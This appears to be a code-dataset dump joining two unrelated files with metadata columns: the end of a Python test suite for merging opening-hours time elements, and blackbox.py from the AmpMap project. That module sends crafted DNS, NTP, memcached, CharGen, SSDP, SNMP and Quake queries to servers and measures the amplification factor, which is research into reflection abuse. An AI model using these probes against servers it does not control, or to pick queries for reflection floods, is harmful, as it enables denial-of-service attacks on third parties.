start_time=datetime.time(hour=13, minute=0),
end_time=datetime.time(hour=16, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
assert combine_and_apply_override([te1, te2]) == [te1, te2]
def test_combine_and_apply_override_two_separate_one_unknown_start_one_unknown_end(): # noqa
te1 = TimeElement(
start_time=datetime.time(hour=12, minute=0),
end_time=None,
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=None,
end_time=datetime.time(hour=8, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
assert combine_and_apply_override([te1, te2]) == [te2, te1]
def test_combine_and_apply_override_one_overriding():
te1 = TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=datetime.time(hour=16, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=datetime.time(hour=12, minute=0),
end_time=datetime.time(hour=14, minute=0),
end_time_on_next_day=False,
resource_state=State.CLOSED,
override=True,
full_day=False,
)
assert combine_and_apply_override([te1, te2]) == [
TimeElement(
start_time=datetime.time(hour=12, minute=0),
end_time=datetime.time(hour=14, minute=0),
end_time_on_next_day=False,
resource_state=State.CLOSED,
override=True,
full_day=False,
),
]
def test_combine_and_apply_override_multiple_overriding():
te1 = TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=datetime.time(hour=16, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=datetime.time(hour=9, minute=0),
end_time=datetime.time(hour=11, minute=0),
end_time_on_next_day=False,
resource_state=State.CLOSED,
override=True,
full_day=False,
)
te3 = TimeElement(
start_time=datetime.time(hour=13, minute=0),
end_time=datetime.time(hour=15, minute=0),
end_time_on_next_day=False,
resource_state=State.CLOSED,
override=True,
full_day=False,
)
assert combine_and_apply_override([te1, te2, te3]) == [te2, te3]
def test_combine_and_apply_override_multiple_overriding_overlapping():
te1 = TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=datetime.time(hour=16, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=datetime.time(hour=12, minute=0),
end_time=datetime.time(hour=14, minute=0),
end_time_on_next_day=False,
resource_state=State.CLOSED,
override=True,
full_day=False,
)
te3 = TimeElement(
start_time=datetime.time(hour=13, minute=0),
end_time=datetime.time(hour=15, minute=0),
end_time_on_next_day=False,
resource_state=State.CLOSED,
override=True,
full_day=False,
)
assert combine_and_apply_override([te1, te2, te3]) == [
TimeElement(
start_time=datetime.time(hour=12, minute=0),
end_time=datetime.time(hour=15, minute=0),
end_time_on_next_day=False,
resource_state=State.CLOSED,
override=True,
full_day=False,
),
]
def test_combine_and_apply_full_day_no_override():
te1 = TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=datetime.time(hour=16, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=None,
end_time=None,
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=True,
)
assert combine_and_apply_override([te1, te2]) == [te2]
def test_combine_and_apply_override_with_previous_day():
te1 = TimeElement(
start_time=datetime.time(hour=0, minute=0),
end_time=datetime.time(hour=6, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=datetime.time(hour=5, minute=0),
end_time=datetime.time(hour=9, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
expected = TimeElement(
start_time=datetime.time(hour=0, minute=0),
end_time=datetime.time(hour=9, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
assert combine_and_apply_override([te1, te2]) == [expected]
def test_combine_and_apply_override_two_next_day_ends():
te1 = TimeElement(
start_time=datetime.time(hour=22, minute=0),
end_time=datetime.time(hour=4, minute=0),
end_time_on_next_day=True,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=datetime.time(hour=23, minute=0),
end_time=datetime.time(hour=6, minute=0),
end_time_on_next_day=True,
resource_state=State.OPEN,
override=False,
full_day=False,
)
expected = TimeElement(
start_time=datetime.time(hour=22, minute=0),
end_time=datetime.time(hour=6, minute=0),
end_time_on_next_day=True,
resource_state=State.OPEN,
override=False,
full_day=False,
)
assert combine_and_apply_override([te1, te2]) == [expected]
| 27.86165
| 97
| 0.627755
| 1,464
| 11,479
| 4.597678
| 0.04235
| 0.081117
| 0.142624
| 0.17828
| 0.974149
| 0.974149
| 0.965235
| 0.956619
| 0.940128
| 0.934482
| 0
| 0.026904
| 0.271452
| 11,479
| 411
| 98
| 27.92944
| 0.777951
| 0.000784
| 0
| 0.797143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04
| 1
| 0.04
| false
| 0
| 0.008571
| 0
| 0.048571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
91e1b83c80f515430c10d03a4ecfbc835cb70ebb
| 31,509
|
py
|
Python
|
src/libs/blackbox.py
|
ampmap-cmu/AmpMap
|
5f2d1e3fb9863315041d37a0727a829fce06c515
|
[
"BSD-3-Clause-Clear"
] | 4
|
2021-03-29T03:48:14.000Z
|
2021-09-24T10:18:15.000Z
|
src/libs/blackbox.py
|
ampmap-cmu/AmpMap
|
5f2d1e3fb9863315041d37a0727a829fce06c515
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
src/libs/blackbox.py
|
ampmap-cmu/AmpMap
|
5f2d1e3fb9863315041d37a0727a829fce06c515
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
import dns.message
import dns.rdataclass
import dns.rdatatype
import dns.query
import dns.flags
from collections import OrderedDict
from scapy.all import *
from scapy import *
from scapy.layers.inet import *
from scapy.layers.ntp import *
from scapy.fields import *
'''
PCAP_TO_LOCAL_DISK = True: store pcaps to local (non-NFS) dirs, i.e., /ampmap/pcap
PCAP_TO_LOCAL_DISK = False: store pcaps to NFS dirs, i.e., out/pcap
We would suggest storing pcaps to local dirs to ease the burden of NFS read/writes.
'''
PCAP_TO_LOCAL_DISK = True
# send specific query to the server and get responses
class BlackBox:
def __init__(self, timeout ):
self.proto = None
self.phase = None
self.query_cnt_dict = {}
self.timeout = timeout
# SSDP
def __ssdp_dict(self, serverip, field_dict):
print("Hey, you reach ssdp dic ...")
packets = []
payload = field_dict["start_line"] + "\r\n" + \
"HOST:" + field_dict["host"] + "\r\n" + \
"MAN:\"" + field_dict["man"] + "\"\r\n" + \
"MX:" + str(field_dict["mx"]) + "\r\n" + \
"ST:" + field_dict["st"] + "\r\n\r\n"
print(payload)
ssdpRequest = IP(dst=serverip) / UDP(sport=random.randint(5000,65535), dport= 1900) / payload
res, unans = sr(ssdpRequest, multi=True, timeout=self.timeout)
packets.append(ssdpRequest)
# If there is response
if res is not None:
resplen = 0
for r in res:
resplen = resplen + len(r[1])
print("server_ip: %s, AF: %f\n" %(serverip, resplen/len(ssdpRequest)))
for x in res:
packets.append(x[1])
# store PCAPs of request/response
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return resplen/len(ssdpRequest)
# If there is no response
else:
print("server_ip: %s, AF: 0\n" %serverip)
# store PCAPs of request/response
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return 0
# NTP: including private, normal, control modes
def __ntp_dict(self, serverip, field_dict):
packets = []
print("Hey, you reach NTP dict...")
if field_dict["mode"] == 7:
print("IN PRIVATE MODE 7 ")
payload = NTPPrivate()
elif field_dict["mode"] == 6:
print("IN CONTROL MODE 6")
payload = NTPControl()
else:
payload = NTPHeader()
for fid, val in field_dict.items():
setattr(payload, fid, val)
request = IP(dst=serverip)/UDP(sport=random.randint(5000,65535), dport=123)/payload
packets.append(request)
res, unans = sr(request, multi=True, timeout=self.timeout, verbose=0)
if res is not None:
for x in res:
packets.append(x[1])
resplen = sum([len(x[1]) for x in res])
print("AF: ", float(resplen)/float(len(request)))
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
#time.sleep(5)
return float(resplen)/float(len(request))
else:
print("AF: ", 0)
print()
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return 0
# Quake
def __quake_dict(self, serverip, field_dict):
#convert hex to bytes
packets = []
data = bytearray()
data += bytes.fromhex(field_dict["pre"])
data += bytearray( field_dict["char"], "utf-8")
post = field_dict["post"]
post = struct.pack("B", post)
post = post * field_dict["len_post"]
data += post
request = IP(dst=serverip)/UDP(sport=random.randint(5000,65535), dport=27960) \
/Raw(load=data)
packets.append(request)
res, unans = sr(request, multi=True, timeout=self.timeout, verbose=0)
if res is not None:
resplen = sum([len(x[1]) for x in res])
print("AF: ", float(resplen)/float(len(request)))
for x in res:
packets.append(x[1])
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return float(resplen)/float(len(request))
else:
print("AF: ", 0)
print()
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return 0
return
# CharGen
def __chargen_dict(self, serverip, field_dict):
print("Hey, you reach chargen dic...")
print(field_dict["character"], field_dict["length"])
packets = []
character = field_dict["character"]
length = int(field_dict["length"])
payload = bytearray()
# if character is '0' - '9'
if character >= '0' and character <= '9':
payload = bytearray([int(character)])*length
else:
payload = bytearray(character, 'utf-8')*length
request = IP(dst=serverip)/UDP(sport=random.randint(5000,65535), dport=19)/Raw(load=payload)
print("request " , request)
packets.append(request)
res, unans = sr(request, multi=True, timeout=self.timeout, verbose=0)
print("response ", res)
if res is not None:
resplen = 0
for x in res:
if len(x) >= 2:
resplen += len(x[1])
print("AF: ", float(resplen)/float(len(request)))
print()
for x in res:
packets.append(x[1])
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return float(resplen)/float(len(request))
else:
print("AF: ", 0)
print()
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return 0
# memcached
def __memcached_dict(self, serverip, field_dict):
packets = []
print("Hey, you reach memcached dic...")
data = bytearray()
data += b'\x00\x00\x00\x00\x00\x01\x00\x00'
data = data + bytearray(field_dict["command"], 'utf-8')
if field_dict["key"] != "":
data += bytearray(" ", 'utf-8')
data += bytearray(field_dict["key"], 'utf-8')
data += b'\r\n'
print("data ", data)
request = IP(dst=serverip)/UDP(sport=random.randint(5000,65535), dport=11211)/Raw(load=data)
print("request " , request)
packets.append(request)
res, unans = sr(request, multi=True, timeout=self.timeout, verbose=0)
if res is not None:
resplen = sum([len(x[1]) for x in res])
print("AF: ", float(resplen)/float(len(request)))
for x in res:
packets.append(x[1])
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return float(resplen)/float(len(request))
else:
print("AF: ", 0)
print()
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return 0
# rpc
def __rpc_dict(self, server_ip, field_dict):
msg = rpc.RPCCall( )
# SNMP_Bulk
def __snmpbulk_dict(self, serverip, field_dict):
version = field_dict["version"]
community = field_dict["community"]
id = field_dict["id"]
non_repeaters = field_dict["non_repeaters"]
max_repetitions = field_dict["max_repetitions"]
varbind_oid = field_dict["varbind_oid"]
varbind_multiple = field_dict["varbind_multiple"]
print(varbind_oid)
print("field dic t" , field_dict)
oid_lst = [SNMPvarbind( oid=ASN1_OID( varbind_oid ) )] * varbind_multiple
print ( " oid lst ", oid_lst)
pdutype = SNMPbulk(id= id, non_repeaters = non_repeaters, max_repetitions=max_repetitions, \
varbindlist= oid_lst )
snmppacket = SNMP(version=version, community=community, PDU=pdutype)
request = IP(dst=serverip)/UDP(sport=random.randint(5000,65535),dport=161)/snmppacket
packets = []
packets.append(request)
res, unans = sr(request, multi=True, timeout=self.timeout, verbose=0)
if res is not None:
resplen = sum([len(x[1]) for x in res])
print("AF: ", float(resplen)/float(len(request)))
for x in res:
packets.append(x[1])
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return float(resplen)/float(len(request))
else:
print("AF: ", 0)
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return 0
# SNMP_Next / SNMP_Get
def __snmpstandard_dict(self, serverip, field_dict , SNMPftn):
version = field_dict["version"]
community = field_dict["community"]
id = field_dict["id"]
error = field_dict["error"]
error_index = field_dict["error_index"]
varbind_oid = field_dict["varbind_oid"]
varbind_multiple = field_dict["varbind_multiple"]
oid_lst = [SNMPvarbind( oid=ASN1_OID( varbind_oid ) )] * varbind_multiple
pdutype = SNMPftn(id= id, error = error, error_index = error_index, varbindlist= oid_lst )
snmppacket = SNMP(version=version, community=community, PDU=pdutype)
request = IP(dst=serverip)/UDP(sport=random.randint(5000,65535),dport=161)/snmppacket
packets = []
packets.append(request)
res, unans = sr(request, multi=True, timeout=self.timeout, verbose=0)
if res is not None:
resplen = sum([len(x[1]) for x in res])
print("AF: ", float(resplen)/float(len(request)))
for x in res:
packets.append(x[1])
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return float(resplen)/float(len(request))
else:
print("AF: ", 0)
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return 0
# DNS: without EDNS field
def __dns_message_noedns_dict(self, serverip, field_vals):
try:
packets = []
print("IN NOEDNS section")
id = field_vals["id"]
qr = field_vals["qr"]
aa = field_vals["aa"]
tc = field_vals["tc"]
rd = field_vals["rd"]
ra = field_vals["ra"]
cd = field_vals["cd"]
ad = field_vals["ad"]
opcode = field_vals["opcode"]
rcode = field_vals["rcode"]
url = field_vals["url"]
rdataclass = field_vals["rdataclass"]
rdatatype = field_vals["rdatatype"]
m = dns.message.Message()
m.id = id
if qr:
m.flags |= int(dns.flags.QR)
if aa:
m.flags |= int(dns.flags.AA)
if tc:
m.flags |= int(dns.flags.TC)
if rd:
m.flags |= int(dns.flags.RD)
if ra:
m.flags |= int(dns.flags.RA )
if ad:
m.flags |= int(dns.flags.AD )
if cd:
m.flags |= int(dns.flags.CD )
m.set_opcode(int(opcode))
m.set_rcode(int(rcode))
qname = dns.name.from_text(url)
m.find_rrset(m.question, qname , rdataclass , rdatatype , create=True, force_unique=True)
data = m.to_wire()
request = IP(dst=serverip)/UDP(sport=random.randint(5000,65535),dport=53)/Raw(load=data)
print("request ", request)
packets.append(request)
###################### write to pcap then read ##################
# NOTE: to correctly parse DNS request using scapy,
# we write the request first into a pcap then read
# to ensure the correct packet format
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap_temp/"+serverip):
os.makedirs("/ampmap/pcap_temp/"+serverip)
temp_pcap_filename = "/ampmap/pcap_temp/"+serverip+"/temp.pcap"
wrpcap(temp_pcap_filename, packets)
request = rdpcap(temp_pcap_filename)[0]
else:
if not os.path.exists("out/pcap_temp/"+serverip):
os.makedirs("out/pcap_temp/"+serverip)
temp_pcap_filename = "out/pcap_temp/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
wrpcap(temp_pcap_filename, packets)
request = rdpcap(temp_pcap_filename)[0]
#################################################################
res, unans= sr(request, multi=True, timeout=self.timeout, verbose=0)
if res is not None:
for x in res:
packets.append(x[1])
resplen = sum([len(x[1]) for x in res])
print("AF: ", float(resplen)/float(len(request)))
# pcap dump...
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return float(resplen)/float(len(request))
else:
print("AF: ", 0)
print()
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return 0
except dns.exception.DNSException:
return 0
# DNS
def __dns_message_dict(self, serverip, field_vals):
try:
packets = []
m = dns.message.Message()
id = field_vals["id"]
qr = field_vals["qr"]
aa = field_vals["aa"]
tc = field_vals["tc"]
rd = field_vals["rd"]
ra = field_vals["ra"]
cd = field_vals["cd"]
ad = field_vals["ad"]
opcode = field_vals["opcode"]
rcode = field_vals["rcode"]
edns = field_vals["edns"]
payload = field_vals["payload"]
url = field_vals["url"]
rdataclass = field_vals["rdataclass"]
rdatatype = field_vals["rdatatype"]
dnssec = field_vals["dnssec"]
m.id = id
if qr:
m.flags |= int(dns.flags.QR)
if aa:
m.flags |= int(dns.flags.AA)
if tc:
m.flags |= int(dns.flags.TC)
if rd:
m.flags |= int(dns.flags.RD)
if ra:
m.flags |= int(dns.flags.RA )
if ad:
m.flags |= int(dns.flags.AD )
if cd:
m.flags |= int(dns.flags.CD )
m.set_opcode(int(opcode))
m.set_rcode(int(rcode))
m.edns = int(edns)
m.payload=int(payload)
if dnssec:
m.ednsflags |= int( dns.flags.DO)
qname = dns.name.from_text(url)
m.find_rrset(m.question, qname , rdataclass , rdatatype , create=True,
force_unique=True)
data = m.to_wire()
request = IP( dst=serverip)/UDP(sport=random.randint(5000,65535),dport=53)/Raw(load=data)
#print("request ", request)
packets.append(request)
###################### write to pcap then read ##################
# NOTE: to correctly parse DNS request using scapy,
# we write the request first into a pcap then read
# to ensure the correct packet format
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap_temp/"+serverip):
os.makedirs("/ampmap/pcap_temp/"+serverip)
temp_pcap_filename = "/ampmap/pcap_temp/"+serverip+"/temp.pcap"
wrpcap(temp_pcap_filename, packets)
request = rdpcap(temp_pcap_filename)[0]
else:
if not os.path.exists("out/pcap_temp/"+serverip):
os.makedirs("out/pcap_temp/"+serverip)
temp_pcap_filename = "out/pcap_temp/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
wrpcap(temp_pcap_filename, packets)
request = rdpcap(temp_pcap_filename)[0]
#################################################################
res, unans= sr(request, multi=True, timeout=self.timeout, verbose=0)
if res is not None:
for x in res:
packets.append(x[1])
resplen = sum([len(x[1]) for x in res])
print("AF: ", float(resplen)/float(len(request)))
# pcap dump...
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return float(resplen)/float(len(request))
else:
print("AF: ", 0)
print()
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return 0
except dns.exception.DNSException:
return 0
# Given protocol, server ip and query, return the amplification factor (AF) and the response
def get_af_dict(self, serverip, field_dict):
if self.proto.lower() == "dns":
if "edns" in field_dict:
return self.__dns_message_dict( serverip, field_dict )
else:
return self.__dns_message_noedns_dict(serverip, field_dict )
elif self.proto.lower() == "memcached":
return self.__memcached_dict( serverip, field_dict)
elif self.proto.lower() =='chargen' :
return self.__chargen_dict( serverip, field_dict)
elif self.proto.lower() == "ntp":
return self.__ntp_dict(serverip, field_dict )
elif self.proto.lower() == "ssdp":
return self.__ssdp_dict(serverip, field_dict)
elif self.proto.lower() == "quake":
return self.__quake_dict(serverip, field_dict)
elif self.proto.lower() == "snmpbulk":
return self.__snmpbulk_dict(serverip, field_dict)
elif self.proto.lower() == "snmpnext":
return self.__snmpstandard_dict(serverip, field_dict, SNMPnext)
elif self.proto.lower() == "snmpget":
return self.__snmpstandard_dict(serverip, field_dict, SNMPget)
else:
raise ValueError("Protocol is not supported ")
def get_af(self, serverip, field_name, field_values):
assert(len(field_name) == len(field_values))
field_dict = OrderedDict(zip(field_name, field_values))
return self.get_af_dict( serverip, field_dict )
def register_protocol(self,proto):
self.proto = proto
def register_phase(self, phase):
self.phase = phase
self.query_cnt_dict[phase] = 1
def blackbox(timeout):
return BlackBox(timeout)
| 35.403371
| 126
| 0.529531
| 3,591
| 31,509
| 4.482317
| 0.074074
| 0.064302
| 0.05666
| 0.075547
| 0.807903
| 0.794421
| 0.794421
| 0.782617
| 0.761059
| 0.755281
| 0
| 0.011036
| 0.332826
| 31,509
| 889
| 127
| 35.443195
| 0.754638
